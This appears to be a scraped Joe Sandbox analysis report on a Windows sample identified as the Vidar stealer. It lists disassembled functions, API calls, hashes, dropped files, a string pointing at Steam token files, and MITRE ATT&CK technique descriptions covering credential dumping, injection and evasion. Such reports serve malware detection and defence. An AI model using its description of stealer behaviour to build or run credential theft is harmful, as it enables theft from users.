Function 1928EFE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON

Download Yara Rule

Strings

SELECT %s WHERE rowid = ?, xrefs: 1928F017

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: SELECT %s WHERE rowid = ?
API String ID: 0-866778640
Opcode ID: f86eb788a2356664a22fbc31ccb0f8a5c96f53d5e42facd91fca8f8c08f1c1d4
Instruction ID: de9a41c1e1cf8b07c84b998a64a327d72d8baad39c72dff534afb42e76b52d68
Opcode Fuzzy Hash: f86eb788a2356664a22fbc31ccb0f8a5c96f53d5e42facd91fca8f8c08f1c1d4
Instruction Fuzzy Hash: 9511257620534A9FD7209B9AEC40F92F7D4EB40222F24852EF65996680EB72B4518BA0

Function 00414538 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0041453D

Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D

Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB

Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A

lstrlenA.KERNEL32(00000000,00000000,?,00000000,004265B3), ref: 0041458E

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 00414437: _EH_prolog.MSVCRT ref: 0041443C
Part of subcall function 00414437: CreateThread.KERNEL32(00000000,00000000,00413326,?,00000000,00000000), ref: 004144E2
Part of subcall function 00414437: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 004144EA

Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066

Strings

Soft\Steam\steam_tokens.txt, xrefs: 004145A6

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prolog$lstrcpy$lstrlen$CreateObjectSingleThreadWaitlstrcat
String ID: Soft\Steam\steam_tokens.txt
API String ID: 40794102-3507145866
Opcode ID: bfe46d432fd2c99c0e1d4d1886276558fb66de03ceeb22083c1f13a00da24a65
Instruction ID: 67ec4c1d792d67a99180fbd14363f38a75f30ae372fc1f04672944380735093a
Opcode Fuzzy Hash: bfe46d432fd2c99c0e1d4d1886276558fb66de03ceeb22083c1f13a00da24a65
Instruction Fuzzy Hash: D8214971C00188AACB14FBE5C956BDDBB78AF18308F50817EE401725D2DB78274CCA66

Function 0040DC98 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040DCAE

Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E575
Part of subcall function 0041E560: __CxxThrowException@8.LIBCMT ref: 0041E58A
Part of subcall function 0041E560: std::exception::exception.LIBCMT ref: 0041E59B

memmove.MSVCRT ref: 0040DCE7

Strings

invalid string position, xrefs: 0040DCA9

Memory Dump Source

Source File: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2899893197.0000000000446000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000523000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000055E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000561000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000567000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.0000000000586000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000062E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2899893197.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: 6c3c7ea44ad9e5e0a92ce9f69708ac908520c95cb6c982ad81dc5019ca06bff5
Instruction ID: 013243cbf8bd52bdbb76082f5a08148d0adace471495ead66214a40d62cc662f
Opcode Fuzzy Hash: 6c3c7ea44ad9e5e0a92ce9f69708ac908520c95cb6c982ad81dc5019ca06bff5
Instruction Fuzzy Hash: B701F9317042048BE3248E98DD8095BB7A6EF85710720493ED48297385DAB8FC4AD39C

Function 1923B224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON

Download Yara Rule

Strings

misuse, xrefs: 1923B233
%s at line %d of [%.10s], xrefs: 1923B238

Memory Dump Source

Source File: 00000002.00000002.2904662845.0000000019238000.00000020.00001000.00020000.00000000.sdmp, Offset: 19230000, based on PE: true

Associated: 00000002.00000002.2904602943.0000000019230000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019231000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.0000000019396000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2904662845.000000001943D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.000000001943F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905311526.0000000019472000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2905345080.000000001947F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_19230000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$misuse
API String ID: 0-2530468415
Opcode ID: 721332c0cdf2606baca0db7a1f6c346688b3dbf8746bdfd6407518b55e24bb1d
Instruction ID: 9265fdeab8e8ba355c87778a22d55afe6af66e8a2f13d035a1a9f38ef95e3b0f
Opcode Fuzzy Hash: 721332c0cdf2606baca0db7a1f6c346688b3dbf8746bdfd6407518b55e24bb1d
Instruction Fuzzy Hash: 0BC02225100308E3CB00DAD8EC01CC92B204F90B00B8880A0AB2E18082A22081688241

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\KJDGIJECFIEB\DHCFID

C:\ProgramData\KJDGIJECFIEB\EBAEBF

C:\ProgramData\KJDGIJECFIEB\FHJEGI

C:\ProgramData\KJDGIJECFIEB\GCGHJE

C:\ProgramData\KJDGIJECFIEB\HDBGDH

C:\ProgramData\KJDGIJECFIEB\KFBAEC

C:\ProgramData\KJDGIJECFIEB\KJDGIJ

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199686524322[1].htm

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
file.exe

Function 009B018D Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 282
threadinjectionmemoryCOMMON

Function 0014D9D0 Relevance: 11.3, APIs: 7, Instructions: 762
encryptionthreadCOMMON

Function 0014D4D0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 388
memorysynchronizationthreadCOMMON

Function 00140278 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Function 0013A675 Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Function 00132832 Relevance: 4.5, APIs: 3, Instructions: 33
threadCOMMON

Function 0013A5CE Relevance: 4.5, APIs: 3, Instructions: 30
threadCOMMON

Function 0013D8AC Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Function 00142647 Relevance: 3.2, APIs: 2, Instructions: 191
fileCOMMONLIBRARYCODE

Function 00133C45 Relevance: 3.1, APIs: 2, Instructions: 116
COMMON

Function 00142249 Relevance: 3.1, APIs: 2, Instructions: 80
fileCOMMONLIBRARYCODE

Function 00140DF1 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 0013A519 Relevance: 3.0, APIs: 2, Instructions: 38
threadCOMMON

Function 00140343 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Function 001431FD Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre